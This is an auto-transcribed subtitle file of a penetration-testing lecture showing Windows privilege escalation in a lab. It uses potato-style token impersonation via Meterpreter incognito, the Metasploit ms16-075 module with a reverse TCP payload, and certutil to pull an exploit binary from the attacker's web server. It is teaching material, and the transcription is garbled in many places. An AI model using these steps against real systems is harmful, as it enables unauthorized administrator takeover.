1 00:00:00,690 --> 00:00:09,090 Hi, we did this lecture, we're going to continue exploring the other vulnerabilities that we see in 2 00:00:09,090 --> 00:00:10,260 this digital machine. 3 00:00:10,260 --> 00:00:11,880 I'm still in the wind machine. 4 00:00:12,120 --> 00:00:13,700 I'm logged in as a user. 5 00:00:13,710 --> 00:00:20,400 If you don't have that station currently going on right now, just open another interpretational with 6 00:00:20,400 --> 00:00:21,780 running your SBX. 7 00:00:22,050 --> 00:00:27,840 And this is the reason why we have chosen this machine in the first place, because it has more than 8 00:00:27,840 --> 00:00:31,200 one vulnerabilities in order to escalate your privilege. 9 00:00:31,650 --> 00:00:34,110 And I'm going to continue looking for those. 10 00:00:34,110 --> 00:00:40,560 And Regans specifically focus on potatoe attacks because it can be found in caves and Pantex as well. 11 00:00:40,800 --> 00:00:42,540 And that is this one. 12 00:00:42,540 --> 00:00:46,300 So M 16 also in five is a reflection. 13 00:00:46,860 --> 00:00:52,710 OK, so it says that target appears to be vulnerable and we're going to focus on that one and we're 14 00:00:52,710 --> 00:01:00,180 going to see how to exploit it automatically if you actually have to. 15 00:01:00,210 --> 00:01:03,400 Later on, I'm going to show you how to do it manually as well. 16 00:01:03,930 --> 00:01:08,790 So if I search for that on Google, I'm going to go to report seven. 17 00:01:08,790 --> 00:01:10,320 I'm going to go to GetUp! 18 00:01:10,320 --> 00:01:13,490 In order to show you what potatoe attacks meet. 19 00:01:14,490 --> 00:01:19,700 OK, so let me just come over here and see if we have a good description over there. 20 00:01:21,450 --> 00:01:22,830 I believe in the rep at seven. 21 00:01:22,840 --> 00:01:28,650 We only have a description or instruction, you know, to use this in the metal exploit. 22 00:01:28,920 --> 00:01:32,250 OK, I'm going to, of course, show you how to do this as well. 23 00:01:32,580 --> 00:01:36,300 But I'm going to find another thing over here. 24 00:01:36,300 --> 00:01:37,460 Maybe this is good. 25 00:01:38,010 --> 00:01:43,260 So this module, we will abuse the same person privilege. 26 00:01:43,860 --> 00:01:48,830 So it is a commonly found vulnerability in services. 27 00:01:48,960 --> 00:01:50,430 OK, I'd say so here. 28 00:01:50,430 --> 00:01:54,020 And it appears to be so in real life as well. 29 00:01:55,170 --> 00:01:58,020 So what do we mean by impersonation? 30 00:01:58,500 --> 00:02:06,510 So if we go to our interpreter show, OK, and I remember we have gathered information when we first 31 00:02:07,440 --> 00:02:12,440 hacked into the system and we had actually run, who am I? 32 00:02:12,810 --> 00:02:16,320 So if I can get your ID, you will see that I am the apple. 33 00:02:16,320 --> 00:02:18,780 I'm not an administrator or something like that. 34 00:02:19,440 --> 00:02:21,930 And we're going to talk about tokens. 35 00:02:21,930 --> 00:02:23,490 So tokens spell like this. 36 00:02:23,490 --> 00:02:27,930 And if you don't know what the token is, think about the Web applications. 37 00:02:28,200 --> 00:02:36,540 So it actually is a tool that defines our authentication, our user identity. 38 00:02:36,780 --> 00:02:43,160 So if you go to a website, if you make a request to a server, generally, most of the time you get 39 00:02:43,170 --> 00:02:44,100 a token back. 40 00:02:44,460 --> 00:02:49,760 And that's how a server understands that requests are coming from you. 41 00:02:49,770 --> 00:02:51,510 So it responds to you. 42 00:02:51,960 --> 00:02:58,350 Think of it like a cookie and it actually is valid in the window system as well. 43 00:02:58,680 --> 00:03:04,370 So you get a token as a user and other users get a token as well. 44 00:03:04,530 --> 00:03:14,160 OK, so another thing over here is that you can actually impersonate some other users using their token. 45 00:03:15,240 --> 00:03:20,280 So this isn't actually a vulnerability, I'm going to show you that, first of all, you're going to 46 00:03:20,280 --> 00:03:28,020 have to run this load incognito because we're going to have to want to display this tokens by running 47 00:03:28,020 --> 00:03:29,160 this list. 48 00:03:29,280 --> 00:03:30,570 Tokens dash you. 49 00:03:30,570 --> 00:03:32,130 And there is the underscore between. 50 00:03:32,130 --> 00:03:38,970 It lists tokens that you so as you can see, the tokens are available to me is Apple. 51 00:03:38,970 --> 00:03:46,090 And there is an in-person impersonation tokens available as well, which is authority user. 52 00:03:46,650 --> 00:03:51,410 So this impersonation tokens aren't necessarily a vulnerability. 53 00:03:51,410 --> 00:03:56,280 It can be used effectively in server administration as well. 54 00:03:56,550 --> 00:04:00,600 But if there's some mistake, then we can take leverage off that. 55 00:04:00,600 --> 00:04:08,130 We can impersonate the administrator user and without even having to know the administrators password 56 00:04:08,370 --> 00:04:15,780 and without even knowing to have their names, admin names, we can just impersonate them and we can 57 00:04:15,780 --> 00:04:21,060 be admin or we can run any comment as admin in a way that we want. 58 00:04:21,540 --> 00:04:28,140 So in order to do that, first of all, we need to make sure that this is vulnerable. 59 00:04:28,150 --> 00:04:30,180 This is available to us. 60 00:04:30,660 --> 00:04:37,820 And we have seen the first sign in the methods deployed and for the other windows exploit suggested, 61 00:04:37,830 --> 00:04:41,190 we see that this is open to potatoe attacks. 62 00:04:41,570 --> 00:04:49,500 OK, so now I'm going to go into a shell around where my so I ask Apple and I'm going to run away my 63 00:04:49,530 --> 00:04:50,520 slash prive. 64 00:04:50,880 --> 00:04:53,370 So you remember this command? 65 00:04:53,370 --> 00:05:00,710 I said that we were going to use it and over here we're going to have to look for this, impersonate 66 00:05:00,720 --> 00:05:04,110 a client after authentication, impersonate privilege. 67 00:05:04,320 --> 00:05:06,960 So it has to be enabled for some reason. 68 00:05:06,960 --> 00:05:08,700 I'm seeing everything enabled right now. 69 00:05:08,700 --> 00:05:13,920 But if you remember at the first when we hacked in, this was enabled by default. 70 00:05:13,950 --> 00:05:23,040 OK, so if this is enabled and if there is a way to gather the administrator token, then we can run 71 00:05:23,040 --> 00:05:23,730 this attack. 72 00:05:23,730 --> 00:05:27,550 And this attack is called potatoe attack for some reason. 73 00:05:27,980 --> 00:05:36,780 OK, so we can run a potato attack if we can see this table over here, if we are sure that these are 74 00:05:36,780 --> 00:05:44,730 enabled for us, I mean, this is enabled for us and we can try to impersonate the admin itself so that 75 00:05:44,730 --> 00:05:46,500 we can escalate our privilege. 76 00:05:46,860 --> 00:05:50,310 Now, I'm going to exit out of this one into the interpreter. 77 00:05:50,520 --> 00:05:52,300 I'm going to run get prints. 78 00:05:52,320 --> 00:05:56,160 And this is how you see the current privileges in the interpreter as well. 79 00:05:56,190 --> 00:06:02,670 OK, so you don't necessarily have to go into the windows shell and just around who am I? 80 00:06:03,630 --> 00:06:07,590 You can also get prints in order to see your current privileges. 81 00:06:07,950 --> 00:06:12,820 And once you impersonate privilege over there, then you are good to go. 82 00:06:13,320 --> 00:06:16,090 Now we can do this easily in the interpretation. 83 00:06:16,380 --> 00:06:20,250 OK, we can run this potatoe attack in a very easy way. 84 00:06:20,730 --> 00:06:24,110 But it's spelled like this, by the way. 85 00:06:24,110 --> 00:06:29,300 It's actually a potato, but I'm going to show you the manual way as well. 86 00:06:29,550 --> 00:06:37,470 So if you run potato attack something like maybe with a Windows on Google, you can see a lot of resources 87 00:06:37,470 --> 00:06:39,480 over here, like five million results. 88 00:06:39,720 --> 00:06:45,910 So I'm going to go for this hot potato and let's see what we have, what we have here. 89 00:06:46,380 --> 00:06:51,900 So it says that potato privilege escalation on Windows seven, eight and ten. 90 00:06:52,200 --> 00:06:56,280 So server 2008, 2012. 91 00:06:56,640 --> 00:07:03,020 And as you can see, there are some detailed explanations, technical explanations about this attack. 92 00:07:03,360 --> 00:07:06,810 You can actually read this if you want in your own time. 93 00:07:07,080 --> 00:07:11,000 It will be great for you to understand the theory behind it. 94 00:07:11,370 --> 00:07:18,030 We have this hot potato, we know spillage escalation tutorial or some kind of blog over here. 95 00:07:18,510 --> 00:07:25,440 So we see it actually is valid for like almost every Windows version over here. 96 00:07:25,800 --> 00:07:29,010 And it's not about aversion. 97 00:07:29,010 --> 00:07:30,930 It's not about a security patch. 98 00:07:30,930 --> 00:07:35,220 Again, it's kind of a misconfiguration by the administrator user. 99 00:07:36,120 --> 00:07:47,220 It also gives us instructions about how to take leverage of this in a real life example or in no interpretor 100 00:07:47,220 --> 00:07:49,270 shall example, I believe. 101 00:07:49,500 --> 00:07:52,490 OK, and let's see what else we have over here. 102 00:07:53,130 --> 00:07:56,820 OK, we have another pentathlete that block. 103 00:07:57,210 --> 00:08:06,000 So it's kind of a blog and we see we can actually run this potato that exi in a way that is that has 104 00:08:06,000 --> 00:08:07,320 been displayed over here. 105 00:08:07,920 --> 00:08:14,640 So if we go to first thing that we have found, foxgloves, security, potato. 106 00:08:15,210 --> 00:08:17,860 We can see under binaries over here. 107 00:08:17,880 --> 00:08:24,920 I'm going to share dealing with you guys and we we have the potato that you don't have to do that, 108 00:08:24,930 --> 00:08:25,370 OK? 109 00:08:25,860 --> 00:08:30,420 It's easily done with the interpreter, again, that I'm going to show you. 110 00:08:30,420 --> 00:08:31,620 If you had to. 111 00:08:31,920 --> 00:08:32,990 If we had to. 112 00:08:33,030 --> 00:08:36,030 You can just follow along this as well. 113 00:08:36,180 --> 00:08:42,490 Like potato type commands, disable exhaust or something like that. 114 00:08:42,510 --> 00:08:47,100 There are a lot of parameters that you should run in order to make this work. 115 00:08:47,310 --> 00:08:56,100 You can try this, OK, tries to disable the defender if tries to run the potato Yuxi and it tries to 116 00:08:56,100 --> 00:08:57,680 escalate your privilege in a way. 117 00:08:58,380 --> 00:09:01,770 OK, we're going to do this with metal split, as I said before. 118 00:09:02,010 --> 00:09:04,890 But I just want to show you something else as well. 119 00:09:05,220 --> 00:09:07,530 So I'm going to go into the shell, OK? 120 00:09:07,830 --> 00:09:13,110 And we are under the window temp, so I'm going to run short util. 121 00:09:13,680 --> 00:09:15,150 So you don't know that. 122 00:09:15,150 --> 00:09:18,030 And this is one of the reasons why I'm showing you this. 123 00:09:18,030 --> 00:09:27,180 OK, so if you run short util, that's your out cash dash dash f and then specify A you're. 124 00:09:28,230 --> 00:09:36,630 OK, so let me find out, you are to specify I believe we have to just download this Potato Yuxi to 125 00:09:36,630 --> 00:09:39,390 our Windows or Linux machine. 126 00:09:39,720 --> 00:09:41,750 OK, let's see if we can do that. 127 00:09:42,180 --> 00:09:45,300 And then I'm going to download this file. 128 00:09:45,480 --> 00:09:49,220 Let me just say open because Khalid won't let me open. 129 00:09:49,230 --> 00:09:55,230 Otherwise I'm going to take this potato Yuxi, OK, I'm going to cut this and I'm going to put this 130 00:09:55,230 --> 00:10:01,980 on under my bar w w double W HDMI, which is why which is the root of my web server. 131 00:10:02,050 --> 00:10:10,740 OK, so I'm in the callisthenics, I'm going around service Apache to start, so it starts my web server. 132 00:10:11,160 --> 00:10:20,580 Now if I actually just specify this IP address, which is my turn zero from the interpreter, I can 133 00:10:20,580 --> 00:10:21,330 download it. 134 00:10:21,690 --> 00:10:28,050 Right, so 10, 10, 14, 19 and slash potato that xy. 135 00:10:28,800 --> 00:10:33,520 So I'm going to call this potato that XY and here you go. 136 00:10:34,230 --> 00:10:35,970 So why did I show you this? 137 00:10:36,300 --> 00:10:39,610 Because this is like the equivalent of the we get. 138 00:10:39,740 --> 00:10:42,660 OK, we don't need this right now. 139 00:10:42,660 --> 00:10:43,980 You don't have to do that. 140 00:10:44,400 --> 00:10:46,740 And let me run the IP config over here. 141 00:10:46,740 --> 00:10:48,690 So minus 10, 10, 10, five. 142 00:10:48,690 --> 00:10:50,270 So, yep, this is good. 143 00:10:50,670 --> 00:10:51,960 You don't have to do that. 144 00:10:51,960 --> 00:10:55,960 But if you need to, you should know how to do it. 145 00:10:56,390 --> 00:11:03,110 OK, so over here I have the let me try to start this one more time. 146 00:11:03,120 --> 00:11:05,250 Yes, Ted, this is running. 147 00:11:05,520 --> 00:11:07,710 So I believe there is nothing wrong over here. 148 00:11:08,160 --> 00:11:10,280 And let me try that one more time. 149 00:11:10,290 --> 00:11:21,870 By the way, let me see if I misspelled insert util that the URL cache dash f htp um, ten, ten, 14, 150 00:11:21,870 --> 00:11:25,120 19 potatoe that xy. 151 00:11:25,140 --> 00:11:25,980 Let me see. 152 00:11:26,020 --> 00:11:26,250 Yeah. 153 00:11:26,250 --> 00:11:28,790 Potatoe that EIC. 154 00:11:29,220 --> 00:11:36,480 OK, and now I'm going to call the spot XY and see if it works. 155 00:11:38,080 --> 00:11:38,610 Yep. 156 00:11:38,670 --> 00:11:41,760 I believe this is going to work again. 157 00:11:41,850 --> 00:11:44,130 Make sure you take a note of this sir. 158 00:11:44,140 --> 00:11:45,810 Teutul OK. 159 00:11:45,810 --> 00:11:53,790 Yeah it says that comment completed successfully so if we on there right now as you can see. 160 00:11:53,820 --> 00:11:54,030 Yeah. 161 00:11:54,030 --> 00:11:56,760 Pury potatoe that X also here. 162 00:11:56,760 --> 00:12:01,520 So it didn't fail last time but had to do it again just to make sure. 163 00:12:02,130 --> 00:12:05,220 So again, why did I do that. 164 00:12:05,550 --> 00:12:13,170 If I had to, if I didn't have a metal plate or interpretation opened then I should have done well done 165 00:12:13,170 --> 00:12:15,680 this with the Potato Yuxi. 166 00:12:16,110 --> 00:12:18,390 I remember how we go to Windows. 167 00:12:18,390 --> 00:12:19,920 Stop like this. 168 00:12:19,920 --> 00:12:26,910 If you cannot go to Windows Campi just make sure you run this in order to run the search util because 169 00:12:27,090 --> 00:12:32,480 that's how you actually create a file, that's how you actually get a permission to write that file. 170 00:12:33,510 --> 00:12:39,210 So anyway, if I didn't have the interpreter then I would have gone forward that way. 171 00:12:39,330 --> 00:12:46,680 But since I have the interpretation, OK, I'm going to go with this thing over here, so I'm going 172 00:12:46,680 --> 00:12:48,420 to get this into background. 173 00:12:48,630 --> 00:12:55,270 So I'm in the Section two and I'm going to show you how to run this in the windows in the split. 174 00:12:55,530 --> 00:13:01,140 So we're going out to find first the module name, which is M sixteen, also in the fight for your flexion. 175 00:13:01,470 --> 00:13:05,520 So I believe you're going to have to make peace. 176 00:13:05,520 --> 00:13:09,450 And remember that because this is a very particular one. 177 00:13:09,450 --> 00:13:11,040 It's about potato attacks. 178 00:13:11,280 --> 00:13:20,520 OK, once you go over here to my sixteen seventy five reflection, then it says that no payload configured 179 00:13:20,520 --> 00:13:24,990 defaulting to Windows Interpretor reverse TCP, which is good for us. 180 00:13:25,200 --> 00:13:27,030 But if you say so, options. 181 00:13:27,030 --> 00:13:30,120 And if you don't see the payload, you can always set the payload. 182 00:13:30,460 --> 00:13:33,360 So I'm going to set station to two, which is my current station. 183 00:13:33,540 --> 00:13:38,280 I'm going to set my elbows to 10 to 14, 19 Alpert's. 184 00:13:38,280 --> 00:13:41,460 We can change that part or we can just leave it like this. 185 00:13:41,850 --> 00:13:50,310 OK, I'm going to exploit it and see if we can manage to become rudes or at least we can manage to gather 186 00:13:50,310 --> 00:13:54,090 the administrator token. 187 00:13:55,110 --> 00:13:57,740 So it says, that's my interpretation on point. 188 00:13:57,750 --> 00:14:00,660 If I run, get the idea, I'm still it's Apple. 189 00:14:01,290 --> 00:14:08,580 So let's do this and let's see if we can actually become the administrator, because I believe right 190 00:14:08,580 --> 00:14:12,720 now we get the token and we have to use it. 191 00:14:12,720 --> 00:14:15,930 So I'm going to go into the Incognito one more time. 192 00:14:16,470 --> 00:14:20,130 So later on I'm going to list the tokens. 193 00:14:20,130 --> 00:14:20,940 That's you. 194 00:14:21,390 --> 00:14:22,470 And here you go. 195 00:14:22,470 --> 00:14:26,640 Now, the impersonation tokens available is showing the. 196 00:14:27,890 --> 00:14:37,110 User and altered the system, so I'm going to say impersonate, OK, impersonate token under underscore 197 00:14:37,130 --> 00:14:42,050 token, and I'm going to paste this thing in within sight of the quotation marks. 198 00:14:42,770 --> 00:14:44,630 And here you go. 199 00:14:44,630 --> 00:14:47,810 It says that successfully impersonated the user of the system. 200 00:14:48,320 --> 00:14:49,580 Now, let's try this. 201 00:14:49,580 --> 00:14:52,090 Let's see if we are actually the administrator. 202 00:14:52,280 --> 00:14:53,050 Here we go. 203 00:14:53,060 --> 00:14:54,460 We are the administrator. 204 00:14:54,470 --> 00:14:57,380 OK, so we are the administrator. 205 00:14:57,380 --> 00:14:58,940 I'm going to go back into the shell. 206 00:14:59,240 --> 00:14:59,960 I'm going around. 207 00:14:59,960 --> 00:15:00,550 Who am I? 208 00:15:00,770 --> 00:15:02,240 We are the administrator. 209 00:15:02,690 --> 00:15:09,440 You can actually verify this by going into the users, into the administrator folder. 210 00:15:09,440 --> 00:15:12,740 If you can go over here, that means your admin. 211 00:15:13,310 --> 00:15:20,690 So if you go to the desktop, if you run there, you will see the router and you can just type it. 212 00:15:21,650 --> 00:15:22,640 Here you go. 213 00:15:23,060 --> 00:15:26,180 Now, again, one more time, we managed to become rude. 214 00:15:26,180 --> 00:15:31,970 I mean, administrator in windows and we used potato attacks in order to do that. 215 00:15:32,270 --> 00:15:36,740 This is a common mistake that you can actually observing the real systems as well. 216 00:15:36,980 --> 00:15:39,380 So you better understand how to use it. 217 00:15:39,740 --> 00:15:42,860 And I believe we covered every aspect of it. 218 00:15:43,340 --> 00:15:49,130 Now we're going to stop here, but we're going to continue with the privilege escalation in Windows 219 00:15:49,130 --> 00:15:51,950 again in the next lecture together.